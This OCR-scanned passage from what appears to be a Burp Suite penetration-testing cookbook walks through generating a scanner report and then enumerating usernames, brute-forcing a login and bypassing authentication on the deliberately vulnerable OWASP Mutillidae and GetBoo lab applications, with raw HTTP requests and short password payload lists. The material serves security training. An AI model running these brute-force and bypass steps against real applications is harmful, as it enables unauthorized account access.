> @ Cross-ste scripting (reflected) [4] 
@ Cieartext submission of password 
@ Cookie without HttpOnly flag set 
1 XPath injection 
(() Password field with autocomplete enabled 
i Input returned in response (reflected) [17] 
i Cross-domain Referer leakage [3] 
Í HTML does not specify charset [6] 
i Frameable response (potential Clickjacking) [8] 
Í Link manipulation (reflected) [2] 
Path-relative style sheet import [3] 


vyvvvrvryvyY 


GET /mutillidae/ HTTP/1.1 
Host: 192,168. 56.101 

| User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; 

` rv:61.0) Gecko/20100101 Firefox/é1.0 

Accept: 

text/html, application/xhtml+txml, application/xml;q=0.9,* 
/*iq70.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/ 

Connection: close 

Upgrade-Insecure-Requests: 1 


(2] {< (+] g Type a search term 


m 
Q SQL injection 


Issue: SQL injection 
Severity. High 

Confidence: Certain 

Host: http://192.168.56.101 


Issue detail 
2 instances of this issue were identified, at the following locations: 


@ /mutilidae/includes/pop-up-help-context-generator.php [pagename 
parameter] 

© /mutilidae/evel-1-hints-page-wrapper.php [level HinthncludeFile 
parameter] 


Issue background 


SQL injection vulnerabilties arise when user-controllable data is incorporated into 
database SQL queries in an unsafe manner. An attacker can supply crafted input 


Reporting issues 


Reporting capabilities are only available in Burp Professional edition. 


In Burp Professional, as scanner discovers a vulnerability, it will be added to a 
list of issues found on the Target tab, in the right-hand side of the UI. Issues are 
color-coded to indicate the severity and confidence level. An issue with a red 
exclamation point means it is a high severity and the confidence level is certain. 
For example, the SQL Injection issue shown here contains both of these 
attributes. 


Items with a lower severity or confidence level will be low, informational, and 
yellow, gray, or black in color. These items require manual penetration testing to 
validate whether the vulnerability is present. For example, Input returned in 
response is a potential vulnerability identified by scanner and shown in the 
following screenshot. This could be an attack vector for cross-site scripting 
(XSS) or it could be a false positive. It is up to the penetration tester and their 
level of experience to validate such an issue: 


Issues 
$ SQL injection 


a} Cross-site scripting (reflected) 
4} Cleartext submission of password 
©) Password field with autocomplete enabled 


Cookie without HttpOnly flag set 


Input returned in response (reflected) [T] 
Cross-domain Referer leakage 

HTML does not specify charset [3] 

Frameable response (potential Clickjacking} [4] 
Path-relative style sheet import [2] 


e Severity levels: The severity levels available include high, medium, low, 
information, and false positive. Any findings marked as false positive will 
not appear on the generated report. False positive is a severity level that 
must be manually set by the penetration tester on an issue. 

e Confidence levels: The confidence levels available include certain, firm, 
and tentative. 


Getting ready 


After the scanning process completes, we need to validate our findings, adjust 
severities accordingly, and generate our report. 


How to do it... 


1. For this recipe, select Cookie without HttpOnly flag set under the Issues 
heading: 


Issues 


@ SOL injection 
> qh Cross-site scripting (reflected) [3] 


t Cleartext submission of password 
| XPath injection 
aa Password field with autocomplete enabled 


Input returned in response (reflected) [13] 
Cross-domain Referer leakage [3] 

HTML does not specify charset [6] 
Frameable response (potential Clickjacking) [8] 
Link manipulation (reflected) [2] 

Path-relative style sheet import [2] 


bis hies jie jie jia 


TYTY YTFYTYTYY Y 


N 


. Look at the Response tab of that message to validate the finding. We can 
clearly see the PHPSESSID cookie does not have the HttpOnly flag set. 
Therefore, we can change the severity from Low to High and the 
confidence level from Firm to Certain: 


“Raw 


HITP/1.1 200 OK 

Date: Tue, 28 Aug 2018 18:49:43 GMT 

Server: Apache/2.2.14 (Ubuntu) mod _mono/2.4.3 
PHP/S.3.2-lubuntu4.30 with Suhosin-Patch proxy html/3.0.1 
mod python/3.3.1 Python/2.6.5 mod ssl/2.2.14 
OpenssL/0.9.8k Phusion Passenger/4.0.38 mod perl/2.0.4 
Perl/v5.10.1 

X-Powered-By: PHP/5.3.2-lubuntud4. 30 

Set-Cookie: PHPSESSID=pn8ramiklkatSfm4mdrcis0beoS; path=/ 


3. Right-click the issue and change the severity to High by selecting Set 
severity | High: 


Issues 


Q SQL injection 
b u Cross-site scripting (reflected) [3] 
Cleartext submission of password 
| XPath injection 
() Password field with autocomplete enabled 
bplean | Cookie without HttpOnly flag set 
i Cross-domain Referd Report issue 
i HTML does not speci 
| Frameable response 


Set severity 


Set confidence 


Delete issue 


O) Low 


i Information 
FP False positive 


Restore original value 


View 


4. Right-click the issue and change the severity to Certain by selecting Set 
confidence | Certain: 


Issues 


@ SOL injection 
> @ Cross-site scripting (reflected) [3] 
d} Cleartext submission of password 
! XPath injection 


! Cookie without | 1 Cookie without HttpOnly flag set flag set 


Report issue 
Set severity 
HTML does not sped 


; Set confidence 
1 Frameable response 
i Link manipulation ee 


Path-relative style s View b 
Show new site map window 


Input returned in res 
Cross-domain Refe 


! Firm 
? Tentative 


TFF YFF YF 


Restore original value 


Issues help 


5. For this recipe, select the issues with the highest confidence and severity 
levels to be included in the report. After selecting (highlighting + Shift key) 
the items shown here, right-click and select Report selected issues: 


Issues 


Report selected issues 


Upon clicking Report selected issues, a pop-up box appears prompting us 
for the format of the report. This pop-up is the Burp Scanner reporting 
wizard. 


6. For this recipe, allow the default setting of HTML. Click Next. 
7. This screen prompts for the types of details to be included in the report. For 
this recipe, allow the default settings. Click Next. 


8. This screen prompts for how messages should be displayed within the 
report. For this recipe, allow the default settings. Click Next. 

9. This screen prompts for which types of issues should be included in the 
report. For this recipe, allow the default settings. Click Next. 

10. This screen prompts for the location of where to save the report. For this 
recipe, click Select file..., select a location, and provide a file name 
followed by the .htm1 extension; allow all other default settings. Click 
Next: 


Burp Scanner reporting wizard = L 


(?) Select the file where the report will be saved. 


| Select file ... | \Burp_reports\Mutillidae_burp_report.html 


Specify the title and structure to use in the report. 


Report title Burp Scanner Report 


Issue organization By type x | 

Table of contents levels | 2 pX | 

Summary table Allissues v| 
High, medium and low issues |¥| 


W) Embed images within HTML (requires modern browser) 


Summary bar chart 


Back Next 


11. This screen reflects the completion of the report generation. Click Close 


and browse to the saved location of the file. 


12. Double-click the file name to load the report into a browser: 


Burp Scanner Report E BURPSUITE 


PROFESSIONAL 


Summary 


The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This 
reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the 
inherent reliability of the technique that was used to identify the issue. 


Confidence 


Certain Firm Tentative Total 


= 
& 
= 
> 
> 


o 
o 


Severity 
Information Sa 


The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the 
bars fade as the confidence level falls. 


Number of issues 


[o | 2 2 i s 
Hc 
Severity Medium 
Low 
Contents 
1. SQL injection 


2. Cross-site scripting (reflected) 


2.1. http://192.168.56.101/mutillidae/includes/pop-up-help-context-generator.php [pagename parameter] 
2.2. http://192.168.56.101/mutillidae/webservices/soap/ws-hello-world.php [name of an arbitrarily supplied URL parameter] 
2.3. http://192.168.56.101/mutillidae/webservices/soap/ws-hello-world.php [name of an arbitrarily supplied URL parameter] 


3, Cleartext submission of password 


4, Cookie without HttpOnly flag set 


Congratulations! You've created your first Burp report! 


Assessing Authentication Schemes 


In this chapter, we will cover the following recipes: 


Testing for account enumeration and guessable accounts 
Testing for weak lock-out mechanisms 

Testing for bypassing authentication schemes 

Testing for browser cache weaknesses 

Testing the account provisioning process via REST API 


Introduction 


This chapter covers the basic penetration testing of authentication schemes. 
Authentication is the act of verifying whether a person or object claim is true. 
Web penetration testers must make key assessments to determine the strength of 
a target application's authentication scheme. Such tests include launching 
attacks, to determine the presence of account enumeration and guessable 
accounts, the presence of weak lock-out mechanisms, whether the application 
scheme can be bypassed, whether the application contains browser-caching 
weaknesses, and whether accounts can be provisioned without authentication via 
a REST API call. You will learn how to use Burp to perform such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (VM) 
e OWASP Mutillidae link 


e GetBoo link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 
e The Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 


Testing for account enumeration and 
suessable accounts 


By interacting with an authentication mechanism, a tester may find it possible to 

collect a set of valid usernames. Once the valid accounts are identified, it may be 
possible to brute-force passwords. This recipe explains how Burp Intruder can be 
used to collect a list of valid usernames. 


Getting ready 


Perform username enumeration against a target application. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the GetBoo 
application: 


OLD (VULNERABLE) VERSIONS OF REAL APPLICATIONS 


© WordPress @orangeHRM 
@crp-PHP 

Oyazd Owerc alendar 

OGallery2 OTiki Wiki 

O Joomla O awstats 


2. Click the Log In button, and at the login screen, attempt to log in with an 
account username of admin and a password of aaaaa: 


Username — fadmin _ 
Password  feeeeee 


Remember me [] 


Use the account demo/demo for preview. 


New User? | Forgot password? | Activate Account 


3. Note the message returned is The password is invalid. From this 
information, we know admin is a valid account. Let's use Burp Intruder to 
find more accounts. 

4. In Burp's Proxy | HTTP history tab, find the failed login attempt message. 
View the Response | Raw tab to find the same overly verbose error 
message, The password is invalid: 


Target [Few] Spider Scanner | Intruder Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
oo ee 


Fitter: Hiding script, CSS, image and general binary content l 
# áj|Host Method | URL Params | Edited | Status | Length |MMEtype | Extension | Title | Comment | 
=  http://192.168.56.101 POS] oethog 200 S81 HTML H mj 
a > 


= 
omane 


HTTP/1.1 200 OK 

Date: Thu, 30 Aug 2018 19:13:30 GMT 

Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/S.3.2-lubuntud.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ss1/2.2.14 OpenSSL/0.9.8k 
Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v$.10.1 

X-Powered-By: PHP/S.3.2-lubuntud. 30 

Expires: Thu, 19 Nov 1981 08:52:00 CMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Praga: no-cache 

Vary: Accept-Encoding 

Content-Length: 46 

Connection: close 

Content-Type: text/html 


<p class="error">The password is invalid. </p> 


5. Flip back to the Request | Raw tab and right-click to send this request to 
Intruder: 


Burp Intruder Repeater Window Help 


uon [mg Soe [ Seamer [ rider [Repeater Samene { Decote | conparer | Erenaer [rocoto [ ver oetara [At | 


[meron [ Tenson | wens nsr | ortens | 


| Filter: Hiding script, CSS, image and general binary content 


| Params | Edited | Status 


[eaves response | 
[ Raw | Params | Headers | Hex 


POST /getbhoo/login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61 Send to Spider 
Accept: */* 

Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192.168.56.101/getboo/login. php Send to Intruder 
Content-Type: application/x-www-form-urlencoded Send to Repeater 
X-Requested-With: XMLHttpRequest 
Content-Length: 78 Send to Sequencer 

Cookie: PHPSESSID=g5qnSmlhScdhuddus3tqlqjm54; acopendivids=3 Send to Comparer acgroupswithpersist=nada 


Connection: close Send to Decoder 


Do an active scan 


Do a passive scan 


token=51c089a9cc4d708119ab7827c47c633e4name=adminápass=aaaa Show response in browser 


6. Go to Burp's Intruder tab and leave the Intruder | Target tab settings as it 
is. Continue to the Intruder | Positions tab. Notice how Burp places 
payload markers around each parameter value found. However, we only 
need a payload marker around the password value. Click the Clear § button 
to remove the payload markers placed by Burp: 


[ret [ pontons | pavona | oper | 


(2) Payload Positions Start attack 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details. 


Attack type: (Sniper SS oo is 


POST /getboo/login. php HTTP/1.1 


a Add 
Host: 192.168.56.101 (aus j 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/6l.0 
Accept: */# [cers | 


Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate Auto § 
Referer: http: //192.168.56.101/getboo/login. php 

Content-Type: application/x-www-form-urlencoded 
M-Requested-With: XMLHttpRequest 
Content-Length: 78 


Cookie: PHPSESSID=§gSqnSmlhScdhuldus3tqlqjmS4§; acopendivids=§swingset, jotto,phpbb2,redmineS; acgroupswithpersist=Snada$ 
Connection: close 


token=§ 51c08SaScc4d708119ab7827c47cE33e§ cname=§ admin§ cpass=§ aaaaaa§ Csubmitted=§Logtin§ 


7. Then, highlight the name value of admin with your cursor and click the 
Add § button: 


Target | Postions | Payloads | Options 
?| Payload Positions 
eed 
Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details. 


Attack type: | Sniper 


F) 


POST /getboo/login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: */* 

Accept-Language: en-US,en;q=0-5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/getboo/login. php 

Content-Type: application/x-www-form-urlencoded 

X-Requested-With: XMLHttpRequest 

Content-Length: 78 

Cookie: PHPSESSID=g5qnSmlhSedhuldus3tqlqjm54; acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 


token=51c089a9cc4d708119ab7827c47c633eename| pass=aaaaaatsubmitted=LogtIn 


Start attack 


Add § 
Clear § 
Auto § 
Refresh 


8. Continue to the Intruder | Payloads tab. Many testers use word lists to 


enumerate commonly used usernames within the payload marker 


placeholder. For this recipe, we will type in some common usernames, to 


create a custom payload list. 


9. In the Payload Options [Simple list] section, type the string user and click 


the Add button: 


= 


(Taros: | postions [avons 


(2) Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the a 
customized in different ways. 


Payload set: | 1 M Payload count: 0 


Payload type: | Simple list Request count: 0 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


= 


| Add from list ... M 


10. Add a few more strings such as john, tom, demo, and, finally, admin to the 
payload-listing box: 


@ Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


Paste 


Remove 


nisar os er ey ry 
A Enter a new item 


a UCE: 


Add from list ... j 


11. Go to the Intruder | Options tab and scroll down to the Grep — Match 
section. Click the checkbox Flag result items with responses matching 
these expressions. Click the Clear button to remove the items currently in 
the list: 


Decoder 


?| Grep - Match 


(a) These settings can be used to flag result items containing specified expressions. 


(J Flag result tems with responses matching these expressions: 


error 
exception 
illegal 
invalid 
fail 


stack 


access 
directory 
file 


| Add | Enter a new item 


Match type: @ Simple string 
O Regex 


__} Case sensitive match 
Œ) Exclude HTTP headers 


12. Click Yes to confirm you wish to clear the list. 

13. Type the string The password is invalid within the textbox and click the 
Add button. Your Grep — Match section should look as shown in the 
following screenshot: 


Grep - Match 


These settings can be used to flag result items containing specified expressions. 


©) Flag result items with responses matching these expressions: 


| Past | The password is invalid 
| Load... | 


Remove b 


| Clear | 


14. Click the Start attack button located at the top of the Options page. A pop- 
up dialog box appears displaying the payloads defined, as well as the new 
column we added under the Grep — Match section. This pop-up window is 
the attack results table. 

15. The attack results table shows each request with the given payload resulted 
in a status code of 200 and that two of the payloads, john and tom, did not 
produce the message The password is invalid within the responses. 
Instead, those two payloads returned a message of The user does not exist: 


WB intruder attack 2 = O xX 


Attack Save Columns 


EE oe | Poens [reve T omore | 
2 


Request 4| Payload | Status | Error | Timeout | Length The password is invalid | Comment 
0 200 O O ssi E 
1 user 200 531 


4 demo 200 O O 581 E 
5 admin 200 O O 581 cA) 


16. The result of this attack results table provide a username enumeration 
vulnerability based upon the overly verbose error message The password is 
invalid, which confirms the user account exists on the system: 


Attack Save Columns 


Fiter. Showing all tems k 
Request A| Payload Status (Error | Timeout | Length | The passwordis invalid | Comment 

0 200 G O 321 g 

1 user 200 p 0O 3 U 

2 john 200 0 O58 g 

3 tom 200 p O 58 0 

5 admin 200 0 O 5 t 


in] i [oe [rra [ie 


HITP/1.1 200 OK 

Date: Thu, 30 Aug 2018 20:50:59 GMT 

Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/$.3.2-Lubuntu4.30 with Suhosin-Patch proxy html/3.0.1 
nod _python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 GpenSsb/0.9.8k Phusion Passenger/4.0.38 mod _perl/2.0.4 Perl/v$.10.1 
X-Powered-By: PHP/S.3.2-lubuntud. 30 

Expires: Thu, 19 Now 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 

Pragma: no-cache 

Vary: Accept-Encoding 

Content-Length: 46 

Connection: close 

Content-Type: text/html 


<p class="error">The password is invalid. </p> 


This means we are able to confirm that accounts already exist in the system for 
the users user, demo, and admin. 


Testing for weak lock-out 
mechanisms 


Account lockout mechanisms should be present within an application to mitigate 
brute-force login attacks. Typically, applications set a threshold between three to 
five attempts. Many applications lock for a period of time before a re-attempt is 
allowed. 


Penetration testers must test all aspects of login protections, including challenge 
questions and response, if present. 


Getting ready 


Determine whether an application contains proper lock-out mechanisms in place. 
If they are not present, attempt to brute-force credentials against the login page 
to achieve unauthorized access to the application. Using the OWASP Mutillidae 
II application, attempt to log in five times with a valid username but an invalid 
password. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. 


2. 


3. 


From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

At the login screen, attempt to login five times with username admin and 
the wrong password of aaaaaa. Notice the application does not react any 
differently during the five attempts. The application does not change the 
error message shown, and the admin account is not locked out. This means 
the login is probably susceptible to brute-force password-guessing attacks: 


S Back e7 Help Me! 


Eae RADR ORED E E ED E D S D R S D SD A R S S R R R SR S S SRR 


ee 


Please sign-in 


Username (admin 
Password lecccee 


Dont have an account? Please register here 


Let's continue the testing, to brute-force the login page and gain 
unauthorized access to the application. 


4. Go to the Proxy | HTTP history tab, and look for the failed login attempts. 
Right-click one of the five requests and send it to Intruder: 


Fiter. Hiding CSS, image and general binary content 


# A | Host | Method | URL (Params | Edited | Status [Length | MME type | Extension | 
18 p:1/192.168.56.101 POST v 200 50762 HTML php 


100.30. 


Imutilidae/index.php?page= 


frau, [Pons [pentes [ae E 


POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168. 56.101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtwltxml, application/xml;qe0.9,*/*;q=0.8 
Accept-Language: en-US, en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/mutillidae/index. php?page=Login. php 


Content-Type: application/x-www-form-urlencoded Send to Spider 
Content-Length: 60 Do an active scan 
Cookie: showhints=1; PHPSESSID=gSqm9mlhSedhuddudstqlqjms4; acopendivids=swingss i pswithpersist=nada 
Connection: close Do a passive scan 
Upgrade-Insecure-Requests: 1 Send to Intruder Ctrl 

Send to Repeater CtreR 
username=adminépassword=aaaaaadlogin-php-submit-button=Login 

Send to Sequencer 


5. Go to Burp's Intruder tab, and leave the Intruder | Target tab settings as it 
is. Continue to the Intruder | Positions tab and notice how Burp places 
payload markers around each parameter value found. However, we only 
need a payload marker around the password's value. Click the Clear 
§ button to remove the payload markers placed by Burp: 


Target | Proxy | Spider nme Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


ne 


(2) Payload Positions 


Configure the postions where payloads wil be inserted into the base request, The attack type determines the way in which payloads are assigned to payload postions - see help for ful details, 


Attack type: | Sniper 


y 


POST /mutillidae/index.php?page=§login.php§ HTTP/1.1 

Host: 192.168. 56.101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/él.0 
Accept: text/html, application/xhtml+xml, application/xml;q20.9,*/*;q20.8 

Accept-Language; en-US, en;qz0,$ 

Accept-Encoding: gzip, deflate 

Referer: http: //192, 168, $6,101 /mutillidae/index. php?page=Login. php 

Content-Type: application/x-www- form-urlencoded 

Content-Length: 60 

Cookie: showhints=§1§; PHPSRSSID=SgSqnSmlhScdhuddubstqlqjms4§; acopendivids=Sswingset, jotto,phpbb2,redwine§; acgroupswithpersist=Snadag 
Connection: close 

Upgrade-Insecure-Requests; 1 


username=§admin§ cpassword=§aaaaaas slogin-php-submit-button=$Loging 


es) 


6. Then, highlight the password value of aaaaaa and click the Add § button. 
7. Continue to the Intruder | Payloads tab. Many testers use word lists to 


brute-force commonly used passwords within the payload marker 


placeholder. For this recipe, we will type in some common passwords to 


create our own unique list of payloads. 


8. In the Payload Options [Simple list] section, type the string admin123 and 


click the Add button: 


[2] Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


9. Add a few more strings, such as adminpass, welcomet, and, finally, admin 
to the payload-listing box: 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


admin123 


adminpass 
welcome1 


Add from list ... jw 


10. Go to the Intruder | Options tab and scroll down to the Grep — Extract 
section: 


2 


© These settings can be used to extract useful information from responses into the attack results table. 


J Extract the following items from responses: 


(a) 


11. Click the checkbox Extract the following items from responses and then 
click the Add button. A pop-up box appears, displaying the response of the 
unsuccessful login attempt you made with the admin/aaaaaa request. 

12. In the search box at the bottom, search for the words Not Logged In. After 
finding the match, you must highlight the words Not Logged In, to assign 
the grep match correctly: 


B burp Suite Prof ee 
Burp Intruder Repeater Window Help i 


Í Target | Proxy | Spider | Scanner | intrud (2) Define the location of the tem to be extracted. Selecting the item in the response panel will create a suitable configuration automatically, You can 
also modify the configuration manually to ensure t works effectively. 


ae Define start and end ( Extract from regex group 


@ Start after expression: |/-header’ style="margin-left: 20px;"> lass="Version\-header” style="margin\-leff\: 20px;">(.*?)</span> 
C Case sensitive match 
@ Exclude HTTP headers O Start at offset 3288 ase sensiive 
(2) Grep - Extract @ End at delimiter: «span> 


(o) These settings can be used to extract us 
O End at fixed length: 


Extract the following tems from resi 


Le] | C Exclude HTTP headers Œ) Update config based on selection below Refetch response 
aucnn CEE EE 
aS </table> la 
Remove </td> 
</tr> 
<tr> 
(pOu <td bgcolor="ğecccff" align="center" colspan="7"> 
<span class="version-header">Version: 
Up 2.6. 24</span> 
- <span id="idSecurityLevelHeading" class="version-header" 
Down style="nargin-left: 20px;">Security Level: 0 (Hosed)</span> 
<span id="idHintsStatusHeading" CookieTamperingAffectedArea="1" 
Clear class="version~header" style="margin-left: 20px;">Mints: Enabled (1 ~ Script Kiddle)</span> 
— —— <span id="idSystemInformatias dingmmle flectedXSSExecutionPoint="1" 
class="version-header" style="margin-left: pp] 5 > 
Maximum capture length: 100 ad 
</tr> 
<tr> 
<td colspan="2" class="header-menu-table"> 
<table class="header-menu-table"> [T 


(2) Grep - Payloads 


al These settinns ean he used ta flan result Ly eae a [on ] — 


13. If you do not highlight the words properly, after you click OK, you will see 
[INVALID] inside the Grep — Extract box. If this happens, remove the 
entry by clicking the Remove button and try again by clicking the Add 
button, perform the search, and highlight the words. 

14. If you highlight the words properly, you should see the following in the 
Grep — Extract box: 


(2) Grep - Extract 


(o) These settings can be used to extract useful information from responses into the attack results table. 


Œ) Extract the following items from responses: 


15. Now, click the Start attack button at the top right-hand side of the Options 


page. 


16. A pop-up attack results table appears, displaying the request with the 
payloads you defined placed into the payload marker positions. Notice the 
attack table produced shows an extra column entitled 
ReflectedXSSExecution. This column is a result of the Grep — Extract 


Option set previously. 


17. From this attack table, viewing the additional column, a tester can easily 
identify which request number successfully brute-forced the login screen. In 
this case, Request 4, using credentials of the username admin and the 
password admin logged us into the application: 


Attack Save Columns 


Target | Positions | Payloads | Options 


| Fitter: Showing all items 


| Request à| Payload | Status | Error | Timeout | Length ReflectedXSSExecution... | Comment 
0 200 S J 50762 Not Logged In 
1 admin123 200 U O 50762 Not Logged In 
2 adminpass 200 U U 50762 Not Logged In 
3 welcome1 200 U kJ 50762 Not Logged In 
4 admin 302 O O 50905 Logged In Admin: <span... 


18. Select Request 4 within the attack table, and view the Response | Render 
tab. You should see the message Logged In Admin: admin (g0t r00t?) on 


the top right-hand side: 


Attack Save Columns 


Target | Positions | Payloads | Options 


Fitter: Showing all tems 2J 
| Request à| Payload | Status | Error | Timeout | Length | ReflectedXSSExecution... | Comment 
0 200 a) a) 50762 Not Logged In 
1 admin123 200 O O 50762 Not Logged In 
2 adminpass 200 G ie) 50762 Not Logged In 
3 welcome1 200 U ie) 50762 Not Logged In 
1 admin 302 e 3 50905 ogged In Admin: 


Request | Response 


Raw | Headers | Hex | HTML | Render 


Finished 


19. Close the attack table by clicking the X in the top right-hand corner. 


You successfully brute-forced the password of a valid account on the system, 
due to the application having a weak lock-out mechanism. 


Testing for bypassing authentication 
schemes 


Applications may contain flaws, allowing unauthorized access by means of 
bypassing the authentication measures in place. Bypassing techniques include a 
direct page request (that is, forced browsing), parameter modification, 
session ID prediction, and SQL Injection. 


For the purposes of this recipe, we will use parameter modification. 


Getting ready 


Add and edit parameters in an unauthenticated request to match a previously 
captured authenticated request. Replay the modified, unauthenticated request to 
gain access to the application through bypassing the login mechanism. 


How to do it... 


1. Open the Firefox browser to the home page of OWASP Mutillidae II, using 
the Home button from the top menu, on the left-hand side. Make sure you 


are not logged into the application. If you are logged in, select Logout from 
the menu: 


@« OWASP Mutillidae II: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1-5criptKiddte) | Not Loggedin | — | 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured Data 


2. In Burp, go to the Proxy | HTTP history tab and select the request you just 
made, browsing to the home page as unauthenticated. Right-click, and then 
select Send to Repeater: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


|# | Host | Method | URL | Params | Edited | Status | Length 
272 nttp://192.168.56.10 G lli hp&po tificatio. v 200 46441 


| MIME type 


| Extensio 
TML p 


Ż00 


Í Request | Response | 
[Paw l Params | Headers | Hex 


GET /mutillidae/index.php?page=home.phpápopUpNotificationCode=HPHO HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html,application/xhtmlt+xml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=home.phpé&popUpNoti ficationCode=HPHO 


Cookie: showhints=1; PHPSESSID=gS5qmSmlhScdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 


Upgrade-Insecure-Requests: 1 


Send to Spider 

Do an active scan 

Do a passive scan 

Send to Intruder Ctri+1 


Send to Repeater 


3. Using this same request and location, right-click again, and then select 
Send to Comparer (request): 


Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


| Params | Edited 


| Status | Length | MIME type | Extensi 


| Raw | Params | Headers | Hex 


GET /mutillidae/index.php?page=home.phpépopUpNotificationCode=HPHO HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Send to Spider 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192.168.56.101/mutillidae/index.php?page=home.phpépopUpNoti ficationCode=HPHO Do a passive scan 
Cookie: showhints=1; PHPSESSID=gS5qnSmlhScdhuldusstqlqjm54; acopendivids=swingset,jotto,phpbb2,re| Send to Intruder 
Connection: close 
Upgrade-Insecure-Requests: 1 


Do an active scan 


Send to Repeater 
Send to Sequencer 


Send to Comparer 


4. Return to the home page of your browser and click the Login/Register 
button. At the login page, log in with the username of admin and the 
password of admin. Click Login. 

5. After you log in, go ahead and log out. Make sure you press the Logout 
button and are logged out of the admin account. 


6. In Burp, go to the Proxy | HTTP history tab and select the request you just 
made, logging in as admin. Select GET request immediately following the 
POST 302 redirect. Right-click and then select Send to Repeater (request): 


i] Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


WebSockets history | Options 


| Filter: Hiding CSS, image and general binary content 


|\# Al Host | Method | URL | Params | Edited | Status | Length | MIMEtype | Extension | Title 
273 http://192.168.56.101 GET /mutillidae/index.php?page=login.php Vv 200 50789 HTML php 


274 http://192.168.56.101 POST /mutilidae/index. php?page=login.phj PA 302 50905 HTML php 
< 


_{ Raw Params | Headers | Hex 


GET /mutillidae/index.php?popUpNotificationCode=AU1 HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 


Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=login. php 

Cookie: showhints=l1; username=admin; uid=1; PHPSESSID=g5qnSmlhScdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 


Connection: close 
Upgrade-Insecure-Requests: l Send to Spider 
Do an active scan 


Do a passive scan 
Send to Intruder 


7. Using this same request and location, right-click again and Send to 
Comparer (request): 


